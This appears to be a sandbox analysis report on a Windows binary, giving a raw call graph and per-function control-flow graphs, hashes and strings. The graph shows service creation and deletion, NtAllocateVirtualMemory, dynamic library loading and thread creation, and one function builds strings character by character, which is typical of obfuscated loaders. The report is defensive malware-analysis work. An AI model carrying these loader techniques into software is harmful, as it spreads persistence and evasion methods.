InitializeCriticalSection CreateEventW CreateEventW CreateEventW 15492 1400054e0 15489->15492 15491 1400136ef 15493 140005506 _lock 15492->15493 15494 14000552c 15492->15494 15493->15491 15495 1400074d0 LdrLoadDll 15494->15495 15496 140005536 15495->15496 15497 140008370 3 API calls 15496->15497 15500 140005545 __CxxFrameHandler 15497->15500 15498 1400055b8 15499 140008de0 _lock 2 API calls 15498->15499 15501 1400055c0 sprintf_s 15499->15501 15500->15498 15502 1400074f0 LdrLoadDll 15500->15502 15501->15493 15503 140005561 CreateThread 15502->15503 15503->15501 15504 1400055b0 GetLastError 15503->15504 15504->15498 13944 140005a70 GetStartupInfoW GetProcessHeap HeapAlloc 13945 140005add GetVersionExA 13944->13945 13948 140005ab1 13944->13948 13946 140005b0e GetProcessHeap HeapFree 13945->13946 13947 140005af0 GetProcessHeap HeapFree 13945->13947 13954 140005b3c 13946->13954 13951 140005d0b 13947->13951 13949 140005abf 13948->13949 13994 140009540 13948->13994 14002 140009300 13949->14002 13953 140005ac9 14013 140008510 GetModuleHandleA 13953->14013 14017 14000a310 HeapCreate 13954->14017 13957 140005bec 13958 140005c12 13957->13958 13959 140005bf0 13957->13959 13963 140005c17 13958->13963 13960 140005bfe 13959->13960 13961 140009540 _lock 12 API calls 13959->13961 13962 140009300 _lock 10 API calls 13960->13962 13961->13960 13964 140005c08 13962->13964 13965 140005c3d 13963->13965 13967 140005c29 13963->13967 13968 140009540 _lock 12 API calls 13963->13968 13966 140008510 _lock 3 API calls 13964->13966 14020 140009f50 GetStartupInfoA 13965->14020 13966->13958 13969 140009300 _lock 10 API calls 13967->13969 13968->13967 13970 140005c33 13969->13970 13972 140008510 _lock 3 API calls 13970->13972 13972->13965 13974 140005c56 14040 140009e30 13974->14040 13977 140005c5b 14058 140009c30 13977->14058 13981 140005c73 13982 140005c81 13981->13982 13983 1400084e0 _lock 12 API calls 13981->13983 14088 140009690 13982->14088 13983->13982 13985 140005c86 13986 140005c94 13985->13986 13987 1400084e0 _lock 12 API calls 13985->13987 14100 140008650 13986->14100 13987->13986 13989 140005c9e 13990 1400084e0 _lock 12 API calls 13989->13990 13991 140005ca9 13989->13991 13990->13991 14104 140001520 13991->14104 13993 140005ad3 13993->13951 13995 14000954e _lock 13994->13995 13996 14000959c 13995->13996 13998 14000961c 13995->13998 13999 1400095c9 GetStdHandle 13995->13999 13997 140009300 _lock 10 API calls 13996->13997 13997->13998 13998->13949 13999->13996 14000 1400095dc 13999->14000 14000->13996 14001 1400095e2 WriteFile 14000->14001 14001->13996 14005 140009320 _lock 14002->14005 14003 140009330 14003->13953 14004 1400094dc GetStdHandle 14004->14003 14006 1400094ef 14004->14006 14005->14003 14005->14004 14008 140009375 _lock 14005->14008 14006->14003 14007 1400094f5 WriteFile 14006->14007 14007->14003 14008->14003 14009 1400093b9 GetModuleFileNameA 14008->14009 14010 1400093d9 _lock 14009->14010 14122 14000f000 14010->14122 14014 140008543 ExitProcess 14013->14014 14015 14000852a GetProcAddress 14013->14015 14015->14014 14016 14000853f 14015->14016 14016->14014 14018 14000a334 14017->14018 14019 14000a339 HeapSetInformation 14017->14019 14018->13957 14019->13957 14148 140008370 14020->14148 14022 140008370 3 API calls 14026 140009f8a 14022->14026 14023 14000a1c4 GetStdHandle 14029 14000a17c 14023->14029 14024 14000a239 SetHandleCount 14032 140005c48 14024->14032 14025 14000a1d8 GetFileType 14025->14029 14026->14022 14027 14000a0e3 14026->14027 14026->14029 14026->14032 14028 14000a11c GetFileType 14027->14028 14027->14029 14027->14032 14153 14000edc0 14027->14153 14028->14027 14029->14023 14029->14024 14029->14025 14031 14000edc0 _lock 3 API calls 14029->14031 14029->14032 14031->14029 14032->13974 14033 1400084e0 14032->14033 14034 140009540 _lock 12 API calls 14033->14034 14035 1400084ed 14034->14035 14036 140009300 _lock 10 API calls 14035->14036 14037 1400084f4 14036->14037 14038 1400073e0 _lock LdrLoadDll 14037->14038 14039 140008500 14038->14039 14041 140009e7c 14040->14041 14042 140009e3e GetCommandLineW 14040->14042 14045 140009e81 GetCommandLineW 14041->14045 14046 140009e69 14041->14046 14043 140009e49 GetCommandLineW 14042->14043 14044 140009e5e GetLastError 14042->14044 14043->14044 14044->14046 14047 140009e75 14044->14047 14045->14046 14046->14047 14048 140009e91 GetCommandLineA MultiByteToWideChar 14046->14048 14047->13977 14049 140009ec8 14048->14049 14050 140009ed9 14048->14050 14049->13977 14051 140008370 3 API calls 14050->14051 14052 140009eeb 14051->14052 14053 140009f32 14052->14053 14054 140009ef3 MultiByteToWideChar 14052->14054 14053->13977 14055 140009f13 14054->14055 14056 140009f2a 14054->14056 14055->13977 14167 140008de0 14056->14167 14059 140009c52 GetEnvironmentStringsW 14058->14059 14063 140009c86 14058->14063 14061 140009c6c GetLastError 14059->14061 14067 140009c60 14059->14067 14060 140009c91 GetEnvironmentStringsW 14065 140005c67 14060->14065 14060->14067 14061->14063 14064 140009c77 14061->14064 14062 140009d09 GetEnvironmentStrings 14062->14065 14066 140009d17 14062->14066 14063->14060 14063->14064 14064->14062 14064->14065 14084 1400099c0 GetModuleFileNameW 14065->14084 14068 140009d58 14066->14068 14070 140009d20 MultiByteToWideChar 14066->14070 14067->14067 14172 140008300 14067->14172 14071 140008370 3 API calls 14068->14071 14070->14065 14070->14066 14073 140009d68 14071->14073 14076 140009d7d 14073->14076 14077 140009d70 FreeEnvironmentStringsA 14073->14077 14074 140009ce1 __CxxFrameHandler 14079 140009cef FreeEnvironmentStringsW 14074->14079 14075 140009cd1 FreeEnvironmentStringsW 14075->14065 14078 140009de5 FreeEnvironmentStringsA 14076->14078 14080 140009d90 MultiByteToWideChar 14076->14080 14077->14065 14078->14065 14079->14065 14080->14076 14081 140009e0e 14080->14081 14082 140008de0 _lock 2 API calls 14081->14082 14083 140009e16 FreeEnvironmentStringsA 14082->14083 14083->14065 14085 140009a03 14084->14085 14086 140008300 _lock 17 API calls 14085->14086 14087 140009bca 14085->14087 14086->14087 14087->13981 14089 1400096b2 14088->14089 14090 1400096a8 14088->14090 14091 140008370 3 API calls 14089->14091 14090->13985 14099 1400096fa 14091->14099 14092 140009709 14092->13985 14093 1400097a5 14094 140008de0 _lock 2 API calls 14093->14094 14095 1400097b4 14094->14095 14095->13985 14096 140008370 3 API calls 14096->14099 14097 1400097e5 14098 140008de0 _lock 2 API calls 14097->14098 14098->14095 14099->14092 14099->14093 14099->14096 14099->14097 14101 140008666 14100->14101 14103 1400086bf 14101->14103 14188 140005380 14101->14188 14103->13989 14105 140001565 14104->14105 14106 140001569 14105->14106 14107 14000157e 14105->14107 14226 140001430 GetModuleFileNameW OpenSCManagerW 14106->14226 14110 140001595 OpenSCManagerW 14107->14110 14111 14000164f 14107->14111 14114 1400015b2 GetLastError 14110->14114 14115 1400015cf OpenServiceW 14110->14115 14112 140001654 14111->14112 14113 140001669 StartServiceCtrlDispatcherW 14111->14113 14235 1400011f0 14112->14235 14113->13993 14114->13993 14117 140001611 DeleteService 14115->14117 14118 1400015e9 GetLastError CloseServiceHandle 14115->14118 14119 140001626 CloseServiceHandle CloseServiceHandle 14117->14119 14120 14000161e GetLastError 14117->14120 14118->13993 14119->13993 14120->14119 14123 14000f01e _lock 14122->14123 14124 14000f03b LoadLibraryA 14123->14124 14125 14000f125 _lock 14123->14125 14126 14000f054 GetProcAddress 14124->14126 14127 1400094c9 14124->14127 14139 14000f165 14125->14139 14145 1400073e0 LdrLoadDll 14125->14145 14126->14127 14128 14000f06d _lock 14126->14128 14127->13953 14133 14000f075 GetProcAddress 14128->14133 14130 1400073e0 _lock LdrLoadDll 14130->14127 14131 1400073e0 _lock LdrLoadDll 14137 14000f1e9 14131->14137 14135 140007220 _lock 14133->14135 14134 1400073e0 _lock LdrLoadDll 14134->14139 14136 14000f094 GetProcAddress 14135->14136 14138 14000f0b3 _lock 14136->14138 14140 1400073e0 _lock LdrLoadDll 14137->14140 14142 14000f1a3 _lock 14137->14142 14138->14125 14141 14000f0e9 GetProcAddress 14138->14141 14139->14131 14139->14142 14140->14142 14143 14000f101 _lock 14141->14143 14142->14130 14143->14125 14144 14000f10d GetProcAddress 14143->14144 14144->14125 14146 140007333 14145->14146 14146->14145 14147 140007403 14146->14147 14147->14134 14151 1400083a0 14148->14151 14150 1400083e0 14150->14026 14151->14150 14152 1400083be Sleep 14151->14152 14159 14000e850 14151->14159 14152->14150 14152->14151 14154 1400073e0 _lock LdrLoadDll 14153->14154 14155 14000edec _lock 14154->14155 14156 14000ee26 GetModuleHandleA 14155->14156 14157 14000ee1d _lock 14155->14157 14156->14157 14158 14000ee38 GetProcAddress 14156->14158 14157->14027 14158->14157 14160 14000e865 14159->14160 14161 14000e876 _lock 14160->14161 14162 14000e8be HeapAlloc 14160->14162 14164 1400090b0 14160->14164 14161->14151 14162->14160 14162->14161 14165 1400073e0 _lock LdrLoadDll 14164->14165 14166 1400090c5 14165->14166 14166->14160 14168 140008de9 HeapFree 14167->14168 14169 140008e19 _lock 14167->14169 14168->14169 14170 140008dff _lock 14168->14170 14169->14053 14171 140008e09 GetLastError 14170->14171 14171->14169 14175 140008320 14172->14175 14174 140008358 14174->14074 14174->14075 14175->14174 14176 140008338 Sleep 14175->14176 14177 1400090f0 14175->14177 14176->14174 14176->14175 14178 14000919e 14177->14178 14183 140009103 14177->14183 14179 1400090b0 _lock LdrLoadDll 14178->14179 14181 1400091a3 _lock 14179->14181 14180 14000914c HeapAlloc 14180->14183 14186 140009173 _lock 14180->14186 14181->14175 14182 140009540 _lock 12 API calls 14182->14183 14183->14180 14183->14182 14184 140009300 _lock 10 API calls 14183->14184 14185 1400090b0 _lock LdrLoadDll 14183->14185 14183->14186 14187 140008510 _lock 3 API calls 14183->14187 14184->14183 14185->14183 14186->14175 14187->14183 14191 140005250 14188->14191 14190 140005389 14190->14103 14192 140005271 14191->14192 14193 1400073e0 _lock LdrLoadDll 14192->14193 14194 14000527e 14193->14194 14195 1400073e0 _lock LdrLoadDll 14194->14195 14196 14000528d 14195->14196 14200 1400052f0 _lock 14196->14200 14203 140008490 14196->14203 14198 1400052b5 14199 1400052d9 14198->14199 14198->14200 14206 140008400 14198->14206 14199->14200 14202 140008400 7 API calls 14199->14202 14200->14190 14202->14200 14204 1400084c5 HeapSize 14203->14204 14205 140008499 _lock 14203->14205 14205->14198 14208 140008430 14206->14208 14209 140008450 Sleep 14208->14209 14210 140008472 14208->14210 14211 14000e920 14208->14211 14209->14208 14209->14210 14210->14199 14212 14000e935 14211->14212 14213 14000e94c 14212->14213 14223 14000e95e 14212->14223 14214 140008de0 _lock 2 API calls 14213->14214 14217 14000e951 14214->14217 14215 14000e9b1 14216 1400090b0 _lock LdrLoadDll 14215->14216 14219 14000e9b9 _lock 14216->14219 14217->14208 14218 14000e973 HeapReAlloc 14218->14219 14218->14223 14219->14208 14220 14000e9f4 _lock 14222 14000e9f9 GetLastError 14220->14222 14221 1400090b0 _lock LdrLoadDll 14221->14223 14222->14219 14223->14215 14223->14218 14223->14220 14223->14221 14224 14000e9db _lock 14223->14224 14225 14000e9e0 GetLastError 14224->14225 14225->14219 14227 140001482 CreateServiceW 14226->14227 14228 14000147a GetLastError 14226->14228 14230 1400014ea GetLastError 14227->14230 14231 1400014df CloseServiceHandle 14227->14231 14229 1400014fd 14228->14229 14241 140004f30 14229->14241 14232 1400014f2 CloseServiceHandle 14230->14232 14231->14232 14232->14229 14234 14000150d 14234->13993 14236 1400011fa 14235->14236 14250 1400051d0 14236->14250 14239 140004f30 sprintf_s NtAllocateVirtualMemory 14240 140001262 14239->14240 14240->13993 14243 140004f39 __CxxFrameHandler 14241->14243 14242 140004f44 14242->14234 14243->14242 14246 140006c95 14243->14246 14245 14000660e sprintf_s 14245->14234 14247 140006d9d 14246->14247 14248 140006d7b 14246->14248 14247->14245 14248->14247 14249 140006f95 NtAllocateVirtualMemory 14248->14249 14249->14247 14253 140008270 14250->14253 14252 140001238 MessageBoxW 14252->14239 14254 14000827e 14253->14254 14255 1400082ac _lock 14253->14255 14254->14255 14257 140008120 14254->14257 14255->14252 14258 14000816a 14257->14258 14262 14000813b _lock 14257->14262 14260 1400081d7 14258->14260 14258->14262 14263 140007f50 14258->14263 14261 140007f50 sprintf_s 54 API calls 14260->14261 14260->14262 14261->14262 14262->14255 14268 140007f69 sprintf_s 14263->14268 14264 140007f74 _lock 14264->14260 14265 14000801d 14266 1400080d5 14265->14266 14267 14000802f 14265->14267 14269 14000cc00 sprintf_s 54 API calls 14266->14269 14270 140008081 14267->14270 14271 14000804c 14267->14271 14268->14264 14268->14265 14276 14000cd50 14268->14276 14275 140008056 14269->14275 14270->14275 14287 14000c2a0 14270->14287 14279 14000cc00 14271->14279 14275->14260 14277 140008300 _lock 17 API calls 14276->14277 14278 14000cd6a 14277->14278 14278->14265 14280 14000cc3f 14279->14280 14286 14000cc23 _lock sprintf_s 14279->14286 14280->14286 14295 14000fc50 14280->14295 14284 14000ccc5 _lock sprintf_s 14340 14000fd20 LeaveCriticalSection 14284->14340 14286->14275 14288 14000c2c3 _lock sprintf_s 14287->14288 14289 14000c2e0 14287->14289 14288->14275 14289->14288 14290 14000fc50 sprintf_s 25 API calls 14289->14290 14291 14000c34e 14290->14291 14292 14000c1f0 sprintf_s 2 API calls 14291->14292 14293 14000c367 _lock sprintf_s 14291->14293 14292->14293 14374 14000fd20 LeaveCriticalSection 14293->14374 14296 14000fc96 14295->14296 14297 14000fccb 14295->14297 14341 14000b400 14296->14341 14299 14000ccac 14297->14299 14300 14000fccf EnterCriticalSection 14297->14300 14299->14284 14305 14000c3f0 14299->14305 14300->14299 14308 14000c42e 14305->14308 14323 14000c427 _lock sprintf_s 14305->14323 14306 140004f30 sprintf_s NtAllocateVirtualMemory 14307 14000cbe6 14306->14307 14307->14284 14311 14000c4fb __CxxFrameHandler sprintf_s 14308->14311 14308->14323 14368 14000c1f0 14308->14368 14310 14000c841 14312 14000c86a 14310->14312 14313 14000cb20 WriteFile 14310->14313 14311->14310 14315 14000c526 GetConsoleMode 14311->14315 14314 14000c936 14312->14314 14320 14000c876 14312->14320 14316 14000cb53 GetLastError 14313->14316 14313->14323 14321 14000c940 14314->14321 14330 14000ca02 14314->14330 14315->14310 14317 14000c557 14315->14317 14316->14323 14317->14310 14318 14000c564 GetConsoleCP 14317->14318 14318->14323 14336 14000c581 sprintf_s 14318->14336 14319 14000c8c5 WriteFile 14319->14320 14322 14000c928 GetLastError 14319->14322 14320->14319 14320->14323 14321->14323 14324 14000c991 WriteFile 14321->14324 14322->14323 14323->14306 14324->14321 14327 14000c9f4 GetLastError 14324->14327 14325 14000ca57 WideCharToMultiByte 14326 14000cb15 GetLastError 14325->14326 14325->14330 14326->14323 14327->14323 14328 14000cab0 WriteFile 14329 14000caf6 GetLastError 14328->14329 14328->14330 14329->14323 14329->14330 14330->14323 14330->14325 14330->14328 14331 14000fd50 7 API calls sprintf_s 14331->14336 14332 14000c649 WideCharToMultiByte 14332->14323 14333 14000c68c WriteFile 14332->14333 14334 14000c80d GetLastError 14333->14334 14333->14336 14334->14323 14335 14000c829 GetLastError 14335->14323 14336->14323 14336->14331 14336->14332 14336->14335 14337 14000c6e2 WriteFile 14336->14337 14339 14000c81b GetLastError 14336->14339 14337->14336 14338 14000c7ff GetLastError 14337->14338 14338->14323 14339->14323 14342 14000b41e 14341->14342 14343 14000b42f EnterCriticalSection 14341->14343 14347 14000b2f0 14342->14347 14345 14000b423 14345->14343 14346 1400084e0 _lock 12 API calls 14345->14346 14346->14343 14348 14000b317 14347->14348 14349 14000b32e 14347->14349 14350 140009540 _lock 12 API calls 14348->14350 14351 14000b342 _lock 14349->14351 14353 140008300 _lock 17 API calls 14349->14353 14352 14000b31c 14350->14352 14351->14345 14354 140009300 _lock 10 API calls 14352->14354 14355 14000b350 14353->14355 14356 14000b324 14354->14356 14355->14351 14357 14000b400 _lock 22 API calls 14355->14357 14358 140008510 _lock GetModuleHandleA GetProcAddress ExitProcess 14356->14358 14359 14000b371 14357->14359 14358->14349 14360 14000b3a7 14359->14360 14361 14000b379 14359->14361 14363 140008de0 _lock HeapFree GetLastError 14360->14363 14362 14000edc0 _lock LdrLoadDll GetModuleHandleA GetProcAddress 14361->14362 14364 14000b386 14362->14364 14367 14000b392 _lock 14363->14367 14366 140008de0 _lock HeapFree GetLastError 14364->14366 14364->14367 14365 14000b3b0 LeaveCriticalSection 14365->14351 14366->14367 14367->14365 14369 14000c20c sprintf_s 14368->14369 14370 14000c212 _lock 14369->14370 14371 14000c22c SetFilePointer 14369->14371 14370->14311 14372 14000c24a GetLastError 14371->14372 14373 14000c254 sprintf_s 14371->14373 14372->14373 14373->14311 13940 140006c95 13941 140006d9d 13940->13941 13942 140006d7b 13940->13942 13942->13941 13943 140006f95 NtAllocateVirtualMemory 13942->13943 13943->13941 14375 1400054e0 14376 140005506 _lock 14375->14376 14377 14000552c 14375->14377 14388 1400074d0 14377->14388 14380 140008370 3 API calls 14383 140005545 __CxxFrameHandler 14380->14383 14381 1400055b8 14382 140008de0 _lock 2 API calls 14381->14382 14384 1400055c0 sprintf_s 14382->14384 14383->14381 14392 1400074f0 14383->14392 14384->14376 14387 1400055b0 GetLastError 14387->14381 14390 140007333 14388->14390 14389 140005536 14389->14380 14390->14389 14391 1400073e0 LdrLoadDll 14390->14391 14391->14390 14393 140007333 14392->14393 14394 140005561 CreateThread 14393->14394 14395 1400073e0 LdrLoadDll 14393->14395 14394->14384 14394->14387 14395->14393

                                                                              Executed Functions

                                                                              Function 0000000140006C95 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260COMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 131 140006c95-140006d75 132 1400075a3-1400075af 131->132 133 140006d7b-140006d9b 131->133 134 140006da2-140006dbc 133->134 135 140006d9d 133->135 136 140006dc3-140006ded 134->136 137 140006dbe 134->137 135->132 138 140006df4-140006e04 136->138 139 140006def 136->139 137->132 140 140006e06 138->140 141 140006e0b-140006e19 138->141 139->132 140->132 142 140006e1b 141->142 143 140006e20-140006e2f 141->143 142->132 144 140006e31 143->144 145 140006e36-140006e4e 143->145 144->132 146 140006e5a-140006e67 145->146 147 140006e69-140006e94 146->147 148 140006e9d-140006ed0 146->148 149 140006e96 147->149 150 140006e9b 147->150 151 140006edc-140006ee9 148->151 149->132 150->146 153 140006f89-140006f8e 151->153 154 140006eef-140006f23 151->154 155 140006f95-140006fd6 NtAllocateVirtualMemory 153->155 156 140006f90 153->156 157 140006f25-140006f2d 154->157 158 140006f2f-140006f33 154->158 155->132 160 140006fdc-140007020 155->160 156->132 159 140006f37-140006f7a 157->159 158->159 161 140006f84 159->161 162 140006f7c-140006f80 159->162 163 14000702c-140007037 160->163 161->151 162->161 165 140007039-140007058 163->165 166 14000705a-140007062 163->166 165->163 168 14000706e-14000707b 166->168 169 140007081-140007094 168->169 170 140007148-14000715e 168->170 173 140007096-1400070a9 169->173 174 1400070ab 169->174 171 1400072e2-1400072eb 170->171 172 140007164-14000717a 170->172 172->171 173->174 175 1400070ad-1400070db 173->175 176 140007064-14000706a 174->176 177 1400070ea-140007101 175->177 176->168 178 140007143 177->178 179 140007103-140007141 177->179 178->176 179->177
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$@
                                                                              • API String ID: 0-149943524
                                                                              • Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                                                              • Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
                                                                              • Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                                                              • Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00
                                                                              Function 00000001400073E0 Relevance: 1.6, APIs: 1, Instructions: 121libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 256 1400073e0-1400073e9 LdrLoadDll 257 1400073f8-140007401 256->257 258 140007403 257->258 259 140007408-14000742e 257->259 260 1400075a3-1400075af 258->260 262 140007435-140007462 259->262 263 140007430 259->263 265 140007464-14000747e 262->265 266 1400074b6-1400074e9 262->266 264 140007559-140007567 263->264 274 140007341-1400073de 264->274 275 14000756c-1400075a2 264->275 268 1400074b4 265->268 269 140007480-1400074b3 265->269 270 1400074eb-14000752b 266->270 271 14000752c-140007535 266->271 268->271 269->268 270->271 272 140007552 271->272 273 140007537-140007554 271->273 272->260 273->264 274->256 275->260
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: Load
                                                                              • String ID:
                                                                              • API String ID: 2234796835-0
                                                                              • Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                                                              • Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
                                                                              • Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                                                              • Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00
                                                                              Function 0000000140005DF3 Relevance: 54.3, APIs: 3, Strings: 28, Instructions: 79fileCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: File$CreateReadmalloc
                                                                              • String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
                                                                              • API String ID: 3950102678-3381721293
                                                                              • Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                                                              • Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
                                                                              • Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                                                              • Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22
                                                                              Function 00007FFE1A521C00 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 25 7ffe1a521c00-7ffe1a521c06 26 7ffe1a521c41-7ffe1a521c4b 25->26 27 7ffe1a521c08-7ffe1a521c0b 25->27 30 7ffe1a521d68-7ffe1a521d7d 26->30 28 7ffe1a521c35-7ffe1a521c74 call 7ffe1a522470 27->28 29 7ffe1a521c0d-7ffe1a521c10 27->29 48 7ffe1a521d42 28->48 49 7ffe1a521c7a-7ffe1a521c8f call 7ffe1a522304 28->49 31 7ffe1a521c12-7ffe1a521c15 29->31 32 7ffe1a521c28 __scrt_dllmain_crt_thread_attach 29->32 33 7ffe1a521d7f 30->33 34 7ffe1a521d8c-7ffe1a521da6 call 7ffe1a522304 30->34 36 7ffe1a521c21-7ffe1a521c26 call 7ffe1a5223b4 31->36 37 7ffe1a521c17-7ffe1a521c20 31->37 40 7ffe1a521c2d-7ffe1a521c34 32->40 38 7ffe1a521d81-7ffe1a521d8b 33->38 46 7ffe1a521da8-7ffe1a521dd9 call 7ffe1a52242c call 7ffe1a5222d4 call 7ffe1a5227b4 call 7ffe1a5225d0 call 7ffe1a5225f4 call 7ffe1a52245c 34->46 47 7ffe1a521ddb-7ffe1a521e0c call 7ffe1a522630 34->47 36->40 46->38 59 7ffe1a521e0e-7ffe1a521e14 47->59 60 7ffe1a521e1d-7ffe1a521e23 47->60 53 7ffe1a521d44-7ffe1a521d59 48->53 57 7ffe1a521c95-7ffe1a521ca6 call 7ffe1a522374 49->57 58 7ffe1a521d5a-7ffe1a521d67 call 7ffe1a522630 49->58 75 7ffe1a521cf7-7ffe1a521d01 call 7ffe1a5225d0 57->75 76 7ffe1a521ca8-7ffe1a521ccc call 7ffe1a522778 call 7ffe1a5222c4 call 7ffe1a5222e8 call 7ffe1a527b10 57->76 58->30 59->60 64 7ffe1a521e16-7ffe1a521e18 59->64 65 7ffe1a521e65-7ffe1a521e6d call 7ffe1a521720 60->65 66 7ffe1a521e25-7ffe1a521e2f 60->66 71 7ffe1a521f02-7ffe1a521f0f 64->71 77 7ffe1a521e72-7ffe1a521e7b 65->77 72 7ffe1a521e31-7ffe1a521e34 66->72 73 7ffe1a521e36-7ffe1a521e3c 66->73 78 7ffe1a521e3e-7ffe1a521e44 72->78 73->78 75->48 99 7ffe1a521d03-7ffe1a521d0f call 7ffe1a522620 75->99 76->75 127 7ffe1a521cce-7ffe1a521cd5 __scrt_dllmain_after_initialize_c 76->127 86 7ffe1a521eb3-7ffe1a521eb5 77->86 87 7ffe1a521e7d-7ffe1a521e7f 77->87 82 7ffe1a521ef8-7ffe1a521f00 78->82 83 7ffe1a521e4a-7ffe1a521e5f call 7ffe1a521c00 78->83 82->71 83->65 83->82 89 7ffe1a521eb7-7ffe1a521eba 86->89 90 7ffe1a521ebc-7ffe1a521ed1 call 7ffe1a521c00 86->90 87->86 94 7ffe1a521e81-7ffe1a521ea3 call 7ffe1a521720 call 7ffe1a521d68 87->94 89->82 89->90 90->82 108 7ffe1a521ed3-7ffe1a521edd 90->108 94->86 122 7ffe1a521ea5-7ffe1a521eaa 94->122 115 7ffe1a521d11-7ffe1a521d1b call 7ffe1a522538 99->115 116 7ffe1a521d35-7ffe1a521d40 99->116 113 7ffe1a521edf-7ffe1a521ee2 108->113 114 7ffe1a521ee4-7ffe1a521ef2 108->114 119 7ffe1a521ef4 113->119 114->119 115->116 126 7ffe1a521d1d-7ffe1a521d2b 115->126 116->53 119->82 122->86 126->116 127->75 128 7ffe1a521cd7-7ffe1a521cf4 call 7ffe1a527acc 127->128 128->75
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2146081341.00007FFE1A521000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                              • Associated: 00000004.00000002.2146068662.00007FFE1A520000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146098149.00007FFE1A532000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146117176.00007FFE1A53D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146133513.00007FFE1A53F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_7ffe1a520000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                              • String ID:
                                                                              • API String ID: 190073905-0
                                                                              • Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                                                              • Instruction ID: 6773b2ad9367cda5cd586e1e2b97c7fae3f755000b968a3ccc71c4fb11416b01
                                                                              • Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                                                              • Instruction Fuzzy Hash: 24817C39F0CF43C5F6549BA7A8412BA2692BF97FA0F5480F7E90C476B6DE3CA5458600
